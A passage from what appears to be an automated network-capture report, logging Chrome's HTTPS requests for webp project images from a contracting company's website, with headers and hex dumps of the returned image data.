                                              2024-09-27 06:20:17 UTC8000INData Raw: 30 b3 f0 bb a6 33 61 6f 9e 7a 87 5c 55 4c 0a db 70 e6 63 9c 80 34 fd 74 26 9b 55 ba ea 96 3f 99 c9 5c 0b 0c 57 14 d6 4f c0 87 89 e8 1b 93 4e 3d 6d 45 7d 01 30 cd f3 f6 88 e5 6a fb ea 74 93 08 db 27 69 f8 d3 ec 60 5c ca b3 b1 34 2d e4 bf a3 79 f6 ff 78 fc 02 bf e1 15 4b f0 19 2f d0 49 3b d7 7e a6 6c fa 82 e7 04 57 df 84 02 af 0e 80 c9 4d 6a 16 33 ec ef 4d 7e a4 3c df d1 ee b3 d9 b6 ba 97 39 b3 e8 90 ce 70 a6 c9 52 39 25 90 d4 d4 f9 72 8a 42 f7 3e 1b e2 ae ec 19 bc 68 2c f3 cf 4e 5a 95 55 c9 cc 7d b1 ae a3 15 55 c2 47 10 d3 79 0d ed d1 bd 95 3b 29 a6 98 d3 7f 43 05 0f 72 20 db e9 19 d2 53 9c d1 35 84 ce 48 79 97 58 5e 96 af c4 c3 59 e7 21 17 07 38 14 71 25 c3 ed bc b4 47 7b 7d 23 4e c9 3a 5b 01 d3 3c b5 2d 1d 16 8b 96 f6 17 28 c6 02 bb cd f5 ff 7c 6b f6 b2
                                              Data Ascii: 03aoz\ULpc4t&U?\WON=mE}0jt'i`\4-yxK/I;~lWMj3M~<9pR9%rB>h,NZU}UGy;)Cr S5HyX^Y!8q%G{}#N:[<-(|k
                                              2024-09-27 06:20:17 UTC8000INData Raw: b6 8b be 94 4d 77 60 26 2e e1 4d 67 8c 45 f2 2f d7 cc 62 ae bc 78 7c 5d 81 6d 8f 06 07 78 4a fe a5 2d 7f 69 0e a8 76 e8 9d 21 6f 57 38 ff ab 06 f0 ec c6 c7 63 89 6e 27 52 9f 2c 9a 34 52 de 98 ea c6 40 f2 cf 4e ed 45 af b9 5e 9f fe 3c 0d 81 00 18 ed 7d a3 1f 60 05 99 97 c7 aa 1a 2d 1a ba 8a 49 3e d6 da 0f 7c e4 06 59 48 b3 0d 33 b1 a6 47 7b 32 3a b1 33 a6 58 60 85 6f f1 d4 d5 88 d6 66 25 12 08 ad e6 f0 dd 3a 31 90 e2 6e 80 7e 47 7e dc aa f7 1a cf 6a db 48 22 21 0a 27 0c d1 19 60 7f 86 25 da 82 95 fb 83 ec bf 17 9f b8 df 73 2d 13 30 06 ca a1 a7 aa fa 5b 3d e2 03 61 d4 f9 a4 f5 4f 3a ef b9 ac 30 6f db f9 ca 58 c9 97 24 73 24 4c 68 58 02 22 44 ba 3c 25 8c c9 48 e5 94 88 45 da 66 57 f3 90 5b 63 20 f1 77 a3 de 6c 6f 7f 50 85 e4 80 75 cc 40 0d 84 23 99 4d e1 ef
                                              Data Ascii: Mw`&.MgE/bx|]mxJ-iv!oW8cn'R,4R@NE^<}`-I>|YH3G{2:3X`of%:1n~G~jH"!'`%s-0[=aO:0oX$s$LhX"D<%HEfW[c wloPu@#M
                                              2024-09-27 06:20:17 UTC6969INData Raw: 74 85 5f f5 a9 42 a2 39 02 57 eb 8f b1 ca d5 c1 bf 68 a3 42 ae ef 14 d2 1c 31 8b 99 3b ab cd a6 a0 37 f2 3a eb ae b9 b8 8a e5 39 e9 ce 34 d7 c5 c8 2f 27 9d 88 f3 cc 79 8c 9d ca 83 95 7d f1 15 78 32 1e 46 ae 0d ba d5 0e 17 39 e2 50 f3 04 36 a8 40 dc 2e bd ae 4e 7d e4 91 88 d0 db 17 51 e7 33 e6 8c 90 e0 d9 0d 3a 11 56 24 90 9b 37 d4 9d e0 69 c9 52 c4 80 7e b3 5a 41 19 70 2e 97 90 b4 21 b9 51 69 90 ae 97 3e 71 a1 ae 0a ba 72 d9 3a 28 0c f1 fd 21 19 98 3c 11 f9 01 ad d9 e0 aa 86 6e 4e 49 e8 8d 8c 67 5d c9 06 02 26 c0 54 4f a5 ce e1 d6 4a 60 34 cf 3e a0 94 56 2c f4 70 f2 d5 27 ed e0 cd 4c fb c0 47 20 3f 9e 51 24 c9 00 cf 96 09 66 7d 76 fc 68 1c 41 ff 3e 41 62 08 a3 75 0c 69 b2 76 05 9d ea ad 47 63 79 c0 71 a7 62 50 99 58 78 22 d3 f7 a5 01 c4 bc 93 aa 27 1d 35
                                              Data Ascii: t_B9WhB1;7:94/'y}x2F9P6@.N}Q3:V$7iR~ZAp.!Qi>qr:(!<nNIg]&TOJ`4>V,p'LG ?Q$f}vhA>AbuivGcyqbPXx"'5


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              103192.168.2.465431173.231.215.1184436228C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-27 06:20:17 UTC464OUTGET /uploads/projects/5/37ea8047a2494b50f7dc694b8f8dcf37.webp HTTP/1.1
                                              Host: www.citydiamondcontracting.com
                                              Connection: keep-alive
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              Accept: */*
                                              Sec-Fetch-Site: none
                                              Sec-Fetch-Mode: cors
                                              Sec-Fetch-Dest: empty
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
                                              2024-09-27 06:20:17 UTC261INHTTP/1.1 200 OK
                                              Date: Fri, 27 Sep 2024 06:20:17 GMT
                                              Server: Apache
                                              Content-Security-Policy: upgrade-insecure-requests;
                                              Last-Modified: Mon, 09 Jan 2023 12:44:49 GMT
                                              Accept-Ranges: bytes
                                              Content-Length: 83836
                                              Connection: close
                                              Content-Type: image/webp
                                              2024-09-27 06:20:17 UTC7931INData Raw: 52 49 46 46 74 47 01 00 57 45 42 50 56 50 38 58 0a 00 00 00 00 00 00 00 ce 04 00 a2 03 00 56 50 38 20 00 47 01 00 50 5a 06 9d 01 2a cf 04 a3 03 3e e9 6c ad 51 a9 25 bf b6 a7 76 9a 73 f0 1d 09 62 6e 96 bc 3b 69 f7 fa 16 20 9e 83 db 97 35 c1 be 06 0c 17 37 79 71 fa 85 45 45 96 8a fd ff 89 d7 ac ff b0 e9 fd ff 73 c1 d5 03 3c c5 73 c5 fe c5 de cf 17 af fe a2 7b b5 f6 7f d5 7a 81 f1 ff 8c 7f 66 fc 67 af ef f9 7c a2 f9 af 29 4f 7b ef 79 ff 23 f6 ef de 7f ea df 61 bf ea 1f e8 7d 4e ff e9 fd d5 f7 f3 fd eb ff 17 e5 1f c2 7f ea bf f3 7f 79 bd ed fd 3a ff a1 f5 28 fe d3 e9 e7 eb 21 e8 eb e7 39 ff e3 f7 a7 e2 63 fb af ff 3e a0 0f ff fe dd fd 0d fe 3d ff bb cf 87 d0 3f c3 ff e5 fe f7 c9 1f d1 bb 0a b1 0f f5 de 0c 7f 65 f9 e7 eb 57 fc ff 06 ff 56 fe 8b d0 83 cd de 98
                                              Data Ascii: RIFFtGWEBPVP8XVP8 GPZ*>lQ%vsbn;i 57yqEEs<s{zfg|)O{y#a}Ny:(!9c>=?eWV
                                              2024-09-27 06:20:17 UTC8000INData Raw: 7d a8 57 b3 92 c2 5e a2 78 47 43 db bb 91 11 02 1a 6f 32 59 15 94 1c 38 c0 85 6d 0a 2a 07 ab 6b b4 cf 71 72 04 72 12 ba a2 fb 98 5c 51 3e cf fc 91 ff 05 99 7d 3d ad 41 89 f1 42 51 8f 19 ee 22 4b df 6a ae 84 37 04 20 43 69 94 92 83 fe ad e5 8d 41 31 af 22 8c 50 18 81 f8 3f 5e e3 e4 ad 1c 4e 60 b3 b0 7b 26 98 f7 26 2c ba 2b 29 e3 ae db 82 fe c9 5d 83 8a 0c 32 9e 85 ab 43 15 b2 1a 6b 46 06 c0 81 e0 42 2e 5c 6b ed 83 74 43 de 93 48 8e 11 48 c9 c0 2c d6 5d 36 24 e1 dc 0a 16 9d a7 9b 28 5e 94 42 29 12 df 32 29 9a 95 d7 c4 c0 6a dc af ca 00 e7 1b 1e 7e 78 50 2f da c8 c1 cd 93 86 a7 04 8c 17 aa 7d 77 84 ca 0a 73 95 79 e4 84 da 13 22 a4 46 4e d1 7b 7a 8c 37 54 b6 98 5c 5b 14 91 1f 6d ee 9a 48 0e 1d 9f 5f 71 70 78 98 1d f5 db 2c 00 f9 a5 d3 df 6b 6e c4 3c ee 39 d2
                                              Data Ascii: }W^xGCo2Y8m*kqrr\Q>}=ABQ"Kj7 CiA1"P?^N`{&&,+)]2CkFB.\ktCHH,]6$(^B)2)j~xP/}wsy"FN{z7T\[mH_qpx,kn<9
                                              2024-09-27 06:20:17 UTC8000INData Raw: 87 36 14 ee e0 3e 0b 51 d0 f9 77 b9 46 fb ba 29 21 25 2d 11 71 3a a5 86 00 9e 0e fe a7 d0 ed 62 20 fe 44 79 c4 e7 15 1b e2 44 97 cf 24 5f 20 f2 0c 95 a7 62 f1 55 ec 31 b1 40 34 3f b2 a6 4c 37 82 53 98 dc 61 22 1b e8 7e 59 8b e4 a9 60 db d1 74 ea 17 d6 39 39 9c 25 de ef 34 5d e3 44 74 ee 86 3e 26 53 b2 da ae 8f 87 35 e3 29 ac 19 2a f8 20 e3 38 52 85 fe 9b cb f5 e9 83 fb f4 70 62 4a 0a 7b 56 43 43 f3 47 38 42 4c a7 1b 25 fb d6 07 ad a0 fe 93 cb b0 c1 b8 ad 45 e4 d7 94 5f b4 e4 5e c3 e8 b7 1c e9 71 5e a6 d4 19 45 54 9a 00 2e f9 aa f2 ad bb 3f 8b 6f 40 23 94 8f 27 45 98 e9 3e 34 ae 19 c1 09 9a e5 ab 90 d9 e0 6c aa 57 92 d7 fa 33 92 af 0d f9 ef f7 3f cc b2 50 c1 a0 42 56 ba fa 82 66 79 79 be 84 33 50 b2 ca 45 0c e3 c3 b5 b9 1e 9f f7 ef 7f da 3f 0e f1 de 60 d6
                                              Data Ascii: 6>QwF)!%-q:b DyD$_ bU1@4?L7Sa"~Y`t99%4]Dt>&S5)* 8RpbJ{VCCG8BL%E_^q^ET.?o@#'E>4lW3?PBVfyy3PE?`
                                              2024-09-27 06:20:17 UTC8000INData Raw: 72 dd 08 74 92 b7 a2 84 93 e0 43 43 ef 20 fe 82 33 02 94 21 db cf d8 24 5e cc 0c 17 87 5f c6 f1 6e 20 af 7e 55 ae f9 fe c5 15 9c 3f d4 1f 16 90 2c 8e cc 7f 25 38 eb 0f 55 ac 40 0c 1d 67 37 46 12 aa fc d5 a4 9e d1 17 ad 2f c9 00 2b d1 c3 19 25 b6 68 82 73 a7 f6 5c 95 19 b3 78 e9 23 b5 75 14 80 5c a8 6e f1 d0 37 a7 45 b7 24 d1 c6 00 61 49 80 27 e3 bc 2b 5b bf ce b1 d2 9f bb 5a e6 b9 32 cd c9 15 d6 8b 17 5a 39 b5 e7 ed 95 38 73 91 84 51 fc d8 3d d1 c8 21 f8 8d 7e a3 8c f8 c9 1e d2 42 80 1d d8 3f 40 9f ac 26 4c a0 fd 5a 05 00 e2 84 81 d6 08 2e b0 e9 fa d6 15 3c eb e6 2d 74 14 b0 39 52 42 c0 75 48 25 49 ab 3a 92 6b 2d 95 64 a2 c5 58 90 16 f3 0d f5 21 f5 e3 4f 2b 19 70 11 73 e3 fc cc f8 2d f1 75 77 d0 c8 ea 8a bc e3 0e 2f 5f 12 c8 82 05 f3 d8 c0 68 9a 86 16 bc
                                              Data Ascii: rtCC 3!$^_n ~U?,%8U@g7F/+%hs\x#u\n7E$aI'+[Z2Z98sQ=!~B?@&LZ.<-t9RBuH%I:k-dX!O+ps-uw/_h
                                              2024-09-27 06:20:17 UTC8000INData Raw: 5e bf 88 c6 7b 9a ec f1 9a 1d af 92 d3 fb 84 30 9e 6b 65 76 ba 4b 04 03 7b 78 51 3c 2e 93 92 b8 38 71 15 e8 2c ad f3 d7 57 c3 01 89 5e 4b 40 60 b4 de 86 f6 7f e4 b7 67 ab b4 63 94 95 fe d7 85 47 f4 81 15 c3 5e c8 57 5b f5 06 28 dc 3c 0d 6b 07 93 d0 01 a5 87 a9 6d c4 09 84 d1 90 81 19 f1 16 e0 79 8c 69 36 8e 94 f3 19 cc 6b 16 d5 b8 97 71 e4 15 26 d1 67 0b 74 fe b2 68 2f dc 8f 84 14 09 cc da e7 f9 1b ab 09 67 b3 0c 8f 0a fd e6 d0 a0 73 8e aa 03 84 00 2f 1b ee 59 a6 8a 75 9a 0f a8 42 8e ce 14 4a a2 e6 a1 d8 10 17 d6 27 ff 85 88 a9 b2 c8 17 57 22 3b 1a df 1c 74 20 d2 ba 97 7d 49 37 ab d0 a1 98 18 29 ea 09 ca 1e 73 58 4a 16 4d a2 b1 be 34 e0 24 cd 3c fb d9 41 77 db 86 77 f1 45 05 07 f5 57 47 ae d9 0e 7c 98 b5 a2 d1 a6 ec aa 7b 59 3f 91 e1 e6 4a 53 8d d9 ef 4c
                                              Data Ascii: ^{0kevK{xQ<.8q,W^K@`gcG^W[(<kmyi6kq&gth/gs/YuBJ'W";t }I7)sXJM4$<AwwEWG|{Y?JSL
                                              2024-09-27 06:20:17 UTC8000INData Raw: e6 3f ef 5a 8d 1f 73 8b 60 45 ff e7 21 58 9a 34 63 46 5d 2f 7e 1d 83 5e e0 d3 cc d1 1c 3a f5 3e 7c 57 c5 94 0c a7 19 3f fa 8d 40 5f dd 99 b3 c6 6a 09 8b ef e8 24 7e a1 39 34 83 22 82 c0 0c 56 21 f2 29 a3 fa 6e c9 7c 53 4b d0 48 57 fc 94 da 3d 73 3c 08 ac 94 a7 37 33 8a 11 76 7d 8e 3e e2 5b 5d 73 3a 28 01 82 b1 aa b0 8a 7f fe b8 3a 90 8b 63 41 3f 42 79 1a 6f 55 2f b4 1e b3 bf 0d 64 4f e3 93 23 68 50 53 30 c5 d8 0e 82 77 77 69 63 c7 48 83 71 20 af c8 97 c6 e4 e4 e4 c1 c5 92 87 26 91 ed 53 70 95 32 2b 79 f6 a2 32 0f 95 bf 78 f9 e8 07 94 94 e8 dc 96 a1 3f 41 7e 3c 95 74 58 4f b0 7c 4d 72 a7 c9 5b d2 fe bd 11 a2 fe a0 ce fd aa 3f 16 35 7f 66 62 d9 01 09 6b fb 5d 7a d9 f7 03 93 b3 08 68 11 00 53 9a 01 e1 c7 93 ca d1 6c 2c ac cd 1c bf dc d2 2c a2 8b 4f cb 9b 8c
                                              Data Ascii: ?Zs`E!X4cF]/~^:>|W?@_j$~94"V!)n|SKHW=s<73v}>[]s:(:cA?ByoU/dO#hPS0wwicHq &Sp2+y2x?A~<tXO|Mr[?5fbk]zhSl,,O
                                              2024-09-27 06:20:17 UTC8000INData Raw: 04 48 d1 6c 83 01 17 c0 9d fc 66 3c bc b4 f9 ec 1c 05 e0 41 54 d5 d0 ca 9d 8b 5c 92 64 1f e4 5f 16 74 01 a9 d1 b9 aa a3 c9 d2 67 c5 5a e2 f1 c4 53 fb 09 11 b7 6c 4b 36 2a da 9f f7 6d e4 7b c9 91 c6 b8 16 83 7f f4 b3 b9 49 f0 6b 36 14 b6 bc db 91 a7 a4 61 19 61 e1 a0 c2 b8 40 ac 02 4e df fa 96 fe 3b af 6b d9 af ea 46 fd 02 bf 0e aa ac 04 a4 79 fb 02 eb e5 b3 b5 1e 78 b4 64 a6 f2 1e 26 b5 ee 88 6b e2 9f 72 ca 3f c3 9d f1 f9 30 f6 e5 98 33 6b 89 17 25 39 13 00 38 14 fc a6 cc d7 53 aa b5 aa a3 ea 7f 5b 08 00 5c 75 46 93 cb e8 32 84 71 f5 cf 56 e3 9d b2 4c bd d5 c8 35 39 be 99 db d3 07 f3 02 84 ff 04 30 01 a2 4c 4c b4 65 d2 15 a0 01 1d 91 b1 bd 19 c1 00 1e 33 2a e8 4b 2d ad 35 bd 42 5b fe b3 28 ae 51 1f 93 f6 02 ad 59 7a 17 de df 06 d3 f6 38 9e 06 2e b0 27 ed
                                              Data Ascii: Hlf<AT\d_tgZSlK6*m{Ik6aa@N;kFyxd&kr?03k%98S[\uF2qVL590LLe3*K-5B[(QYz8.'
                                              2024-09-27 06:20:17 UTC8000INData Raw: ee 39 46 8c 05 71 4a a2 08 04 88 f9 43 ab 54 f0 6a 1d 95 7e 75 33 6e 78 b4 e4 54 46 6c 8c c1 cc c5 ec c4 9c 42 b8 73 d1 1c 4d 22 95 cb 9f 7c 16 c5 2f 95 ec ff b2 e2 09 e2 18 ce 10 ec 71 71 a4 dd 0b 96 2f d0 fa 0e a6 c5 b1 cd 75 94 4f 4a 14 14 8d 1d df f7 9f eb 3d 64 2b 32 38 9e 28 aa 52 ce 31 fb fd bf f4 42 7d a0 09 33 f3 a8 21 9b 18 5b f6 e1 54 f0 e4 67 df a3 58 32 6f 17 96 32 b6 4f 28 da 0c fa 7c 6b 11 45 bc 83 f6 70 8d aa 19 47 20 4a c5 60 73 0b 07 5b ef 39 0a 2b 09 ed a5 70 42 9e 1f 56 51 04 67 dd 41 bc 12 9b 50 99 07 43 0a db cc 07 b7 ae a2 cf 0f c5 f5 5a c0 77 52 44 7a 99 8a 05 3b 9a 63 78 e8 02 cb 00 65 01 21 5f 5f b0 90 58 7e e1 71 83 c1 1d ed a7 a2 31 f9 74 0d f1 e7 29 be 4f e4 fa 41 34 7e fc ec 22 3a f4 0d ba 71 4e 31 b2 8c fb d1 da 88 b9 8e 35
                                              Data Ascii: 9FqJCTj~u3nxTFlBsM"|/qq/uOJ=d+28(R1B}3![TgX2o2O(|kEpG J`s[9+pBVQgAPCZwRDz;cxe!__X~q1t)OA4~":qN15
                                              2024-09-27 06:20:17 UTC8000INData Raw: 7c 29 fc f3 54 a8 76 f1 06 e7 88 f8 03 b6 7e 9b 4a e4 03 d8 d4 4b ec ac b5 4b 6d 38 b5 6f 43 44 9a 25 6c 1f d1 9b ee e1 e7 0b 12 52 2e 5b 79 44 b5 d2 b2 bd 14 58 d5 82 ff d9 10 42 5b ea ba 4f cb 8b 35 44 8d e5 e7 cb 81 0c 33 4d 4d b1 0f 4b 11 3e 51 db ab 73 f8 a2 cd f1 c6 d8 f2 b6 95 2d 4e 71 29 15 8c 92 bc e1 25 5e bc 51 a5 2c 7e cd 5d 45 21 11 a7 58 0c 8d cb b9 1f ee a9 29 c9 e0 86 78 c2 74 bb 9c 9c 4a ff e8 9e 95 e5 85 9e a3 ac a3 04 d5 48 3c 96 a2 4d 2f a3 e7 31 ae aa 0e 83 aa 23 1e 8b 6e dd 9c 9c 6b 43 91 15 49 56 9c b1 2f ff 50 81 25 75 ce db 44 d9 43 0f 5c c1 fa bc 06 c1 2f 74 81 e2 51 e3 cf ef 7a b5 a8 9d 21 95 9c 0d e9 74 29 0a 05 b7 c5 7f 31 5f 3a f8 3b de 76 2d 28 c8 a3 7e cd be 16 6e 32 fa a3 23 04 62 09 67 9d 9c b7 67 25 78 8c f8 82 11 40 83
                                              Data Ascii: |)Tv~JKKm8oCD%lR.[yDXB[O5D3MMK>Qs-Nq)%^Q,~]E!X)xtJH<M/1#nkCIV/P%uDC\/tQz!t)1_:;v-(~n2#bgg%x@
                                              2024-09-27 06:20:17 UTC8000INData Raw: 93 8c a1 4a 76 c0 35 c3 6e ec a7 62 52 1e 39 b2 02 d8 6d df 65 20 b4 1b ce 7b 7d 3d 07 ad 20 1a 6a 27 7b 5c 25 e1 e0 61 70 e8 79 d0 68 37 af 98 04 5a 0d 79 70 a0 f8 b2 85 ad 2d 28 6e 33 f3 71 8e ae 8d 46 fc b4 72 25 c6 88 4d 1c 54 26 3e 41 b5 bb 3b 82 6c 56 31 1b f1 30 61 fc 37 ad 6d 7e 76 25 28 e0 11 13 01 c6 66 c6 42 f8 af c0 28 2e 46 c3 d6 a0 1f f0 49 87 10 1d fe ea 17 8f 3f 42 fa d4 fc 51 49 0a 53 94 19 f1 3a 51 30 2f d3 e5 6f 21 93 1e de 95 5e 92 a3 75 73 7d 91 ae 40 f4 3c 57 47 a1 25 09 89 92 2e 82 08 8d d3 c3 30 30 40 ad b2 4d 69 82 46 52 f4 46 21 b5 6c d8 1f a4 18 07 bf fa e6 71 85 3f 4f 5a e3 3c ec 22 5e bf 69 99 01 61 55 b4 ae c9 f4 ce e4 cd 83 78 0f 53 db 06 f1 05 ae 36 10 c4 8c 5b e3 dd 4c 93 b6 a1 bb 10 0f 79 e0 54 08 8b d4 79 bc f4 86 1f 31
                                              Data Ascii: Jv5nbR9me {}= j'{\%apyh7Zyp-(n3qFr%MT&>A;lV10a7m~v%(fB(.FI?BQIS:Q0/o!^us}@<WG%.00@MiFRF!lq?OZ<"^iaUxS6[LyTy1


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              104192.168.2.465440173.231.215.1184436228C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-27 06:20:18 UTC724OUTGET /uploads/projects/29/8814c125f673212d4b4567019722294a.webp HTTP/1.1
                                              Host: www.citydiamondcontracting.com
                                              Connection: keep-alive
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              sec-ch-ua-mobile: ?0
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              sec-ch-ua-platform: "Windows"
                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                              Sec-Fetch-Site: same-origin
                                              Sec-Fetch-Mode: no-cors
                                              Sec-Fetch-Dest: image
                                              Referer: https://www.citydiamondcontracting.com/projects
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
                                              2024-09-27 06:20:18 UTC261INHTTP/1.1 200 OK
                                              Date: Fri, 27 Sep 2024 06:20:18 GMT
                                              Server: Apache
                                              Content-Security-Policy: upgrade-insecure-requests;
                                              Last-Modified: Tue, 10 Jan 2023 11:58:57 GMT
                                              Accept-Ranges: bytes
                                              Content-Length: 71512
                                              Connection: close
                                              Content-Type: image/webp
                                              2024-09-27 06:20:18 UTC7931INData Raw: 52 49 46 46 50 17 01 00 57 45 42 50 56 50 38 58 0a 00 00 00 00 00 00 00 ce 04 00 a2 03 00 56 50 38 20 dc 16 01 00 70 a9 05 9d 01 2a cf 04 a3 03 3e e9 6e ad 52 a9 26 37 33 a5 36 da ba e0 1d 09 67 6e 0a de db cf ab c6 53 f9 3a c4 ab f8 03 8b 0f aa 73 6b c3 37 a7 db 44 b5 a3 ff 8a 55 c9 f5 3c 66 7c 85 59 07 1f fe 37 89 d7 a5 7f aa fd 8f eb 58 ff 2b b3 b7 fc af 60 9f 36 cc d8 bf b1 db 5f 9f 37 99 90 e8 d0 3c 5f c7 8b d8 47 8e fe 46 ff b7 f2 3d 8f 34 97 f2 4d 30 fe a7 ff ff 34 7f ff 76 e8 fa f1 fe 73 d0 a6 f9 8f f5 2f fc fe 73 3e a5 fe 47 80 7f a2 76 07 ff 2d 99 3f a5 ff 57 cd af ec 5d ba 3b 55 fd bb fa cf 41 7f d8 bf b7 79 ef 45 f3 ab 94 15 fa 9f f8 cf 3e 8f d7 f3 f7 f8 8f 50 4e 1d 4a 0a 79 43 78 52 fd b3 fe e7 b1 0f f6 8f f5 df b7 64 aa 8e 01 4f 56 d5 df 25
                                              Data Ascii: RIFFPWEBPVP8XVP8 p*>nR&736gnS:sk7DU<f|Y7X+`6_7<_GF=4M04vs/s>Gv-?W];UAyE>PNJyCxRdOV%
                                              2024-09-27 06:20:18 UTC8000INData Raw: 59 3a 4b e2 23 e5 00 8f 51 f6 69 c0 b4 e7 f5 cb 0b 8e 17 ce e8 49 6d 1f ae 3e e8 73 da 0f 9c f8 f6 cf c2 8c d9 14 1d c1 14 42 d1 65 34 16 9d f4 ee 4c 03 ed 3e 43 93 fc 4b c5 28 c9 39 a0 be e6 38 5b 5e 53 25 26 a0 39 93 84 db 65 0c 8c ea b0 c9 cd 60 21 2d 61 b5 63 71 37 e5 2e 03 33 bc 00 68 f9 6e 4a 3a 8d d7 fb 14 01 39 48 6e 3e f8 c8 6f 50 26 20 2b 39 26 38 52 1c a5 eb 75 03 9c 5c d8 3a c0 3d 15 4f 9e d8 51 fd da d6 8c b7 96 6d 93 fc 17 db 76 8a 81 eb 41 5d 48 15 0f 73 13 a1 53 fb 95 9a a2 0e 01 22 0b f4 6c d7 7e e9 71 fb 0d 6a 4d dd 32 76 d3 4d 0b 82 21 5a 0d 8f 57 47 3f 90 02 28 78 2a 86 2d 59 5a 2c 8b 0c 0b 9d 74 e1 2f e0 78 08 a9 a6 d2 1c dc 3d 60 87 bc 80 77 3d f3 67 72 9e e1 e4 e5 19 1e b5 87 0c da 99 65 36 38 2b 6d f7 7c 4d 52 ac 62 0a 3f 19 97 9f
                                              Data Ascii: Y:K#QiIm>sBe4L>CK(98[^S%&9e`!-acq7.3hnJ:9Hn>oP& +9&8Ru\:=OQmvA]HsS"l~qjM2vM!ZWG?(x*-YZ,t/x=`w=gre68+m|MRb?
                                              2024-09-27 06:20:18 UTC8000INData Raw: da 56 c5 0d 41 17 a5 cd 2d 79 65 37 93 94 f0 f8 60 04 30 12 52 6c 2d 24 99 4b b0 2b 55 3e b5 d8 44 62 90 b9 cf b9 52 f4 8a c8 13 8a df 29 26 c5 15 14 76 84 76 98 03 66 4a 52 b4 72 9f 03 9a ce 3e f5 45 e4 a6 bd 42 91 94 73 2d 0d 08 eb 9a 87 cf 8a 86 22 a2 1d d9 08 a3 b4 5a 5d d4 e8 0e a0 40 7f ef 41 8f 4e b8 1e 1f c0 e6 71 eb c3 61 00 00 11 f3 84 29 60 8b 41 20 52 38 79 c6 b5 6b eb 6a aa 47 11 45 8a 17 2a 0c d7 36 cf 2c 5c 58 ac 70 f1 8b 3d 3c 56 cc 05 ed 63 0b 97 be 85 ad 0c f3 7d 46 d5 f7 9a e8 bb d1 4d 80 d8 cd 26 6a a6 0e d5 c0 cc e5 ab 0c 23 5f d8 a6 bd e2 96 77 f1 74 0e 2b ad f8 21 00 65 a9 55 39 21 b7 61 22 dd 9b 87 30 8f c7 da d4 41 91 01 ab 3a 05 50 f5 76 99 49 ec 13 12 bc 58 33 d4 06 ac 7c 74 3f 79 c3 46 ab 68 d5 a3 6d da c4 78 22 cb ac e0 3b 7f
                                              Data Ascii: VA-ye7`0Rl-$K+U>DbR)&vvfJRr>EBs-"Z]@ANqa)`A R8ykjGE*6,\Xp=<Vc}FM&j#_wt+!eU9!a"0A:PvIX3|t?yFhmx";
                                              2024-09-27 06:20:18 UTC8000INData Raw: c4 42 fa f4 77 7a 71 15 c2 55 7b ad cb e3 1a 1a 86 41 b1 a0 da a9 3c 90 cb 9e f9 1a e8 21 74 15 2e 67 bd 82 9b 6e a3 79 74 70 42 25 dd 16 a3 41 3c 85 be 80 ec c4 96 3c 83 9a 9f 11 4b 2f d3 01 94 7e 79 6e f0 f1 7b cb 31 58 75 e1 6d f9 02 fe b9 15 27 e6 ea 32 a5 bf 32 25 f0 ba 4a 09 64 78 ee 6f b4 c6 ae e8 12 29 82 36 e6 8f e2 77 e8 50 b4 06 6e df 36 06 b4 ae f8 7c 30 28 93 55 a3 3b e2 eb 67 e6 e0 04 d3 c5 67 20 75 40 d1 2c 58 58 c3 b1 0b d4 0c 16 a6 66 1a 0e e6 f9 09 85 53 d1 8b 1b d5 64 da bd d0 b2 44 55 0d 9c 71 4c 71 57 e3 f7 e7 98 87 2d 8a d6 e8 5d 55 ad 27 4e f1 29 7e 40 da 28 c7 8b f6 3c 80 a7 cd 4a 18 ab a6 d0 32 1c 28 65 46 3d 14 c3 bf 7d 6d 29 e9 56 28 58 f6 56 3a a2 a1 36 ca 6e 9a 14 65 00 1a e8 8b 45 dc 87 c4 ad 1d 92 2d df 76 07 ea 4a 9a e0 17
                                              Data Ascii: BwzqU{A<!t.gnytpB%A<<K/~yn{1Xum'22%Jdxo)6wPn6|0(U;gg u@,XXfSdDUqLqW-]U'N)~@(<J2(eF=}m)V(XV:6neE-vJ
                                              2024-09-27 06:20:18 UTC8000INData Raw: da cf 4b c8 bc a5 24 9e b5 44 df 09 16 06 5d d4 2d d0 cf cb 97 8b f9 1c 2d 24 36 1d 96 19 fe ff 6d 6f a2 40 39 d8 32 16 48 23 7e e0 90 a7 eb 64 67 a9 eb fd 62 31 c4 d9 c0 e6 40 26 ad 74 0c ab fe a5 5a 39 57 56 db 61 0a d6 b2 d7 18 c8 7e 60 39 9d 33 b4 6d 89 80 10 fc 28 c8 83 a2 a3 a8 71 36 00 63 da 52 c9 75 7b ff 0f a4 7d 19 d4 0b cd ef 4d 66 b8 a2 88 ea ea 2b 16 9e 4d 6c 47 c9 4a b3 26 b6 ae 75 bd 25 da 6e eb 53 34 81 51 53 d8 7f 56 8a cb 82 74 18 0b 66 3f b5 ea 6c 3e fe 34 1b 6b 03 3b a9 1b b3 e8 3a 77 25 3b df 2a 7c b4 4c 73 d0 7b 2a 41 20 7a 61 ba be dd 6c 84 ca 15 28 06 7c 2f 8b 1d e7 30 71 ef dc 6a b4 2b 97 c2 ac ab c1 17 7a 00 31 4d d6 4e ce 86 17 6c 68 6b 1a 41 cd 1c 27 95 f7 69 66 5b c8 26 87 04 9c e5 52 5d 48 1e 87 54 e0 02 82 1b b0 60 dd b9 8e
                                              Data Ascii: K$D]--$6mo@92H#~dgb1@&tZ9WVa~`93m(q6cRu{}Mf+MlGJ&u%nS4QSVtf?l>4k;:w%;*|Ls{*A zal(|/0qj+z1MNlhkA'if[&R]HT`
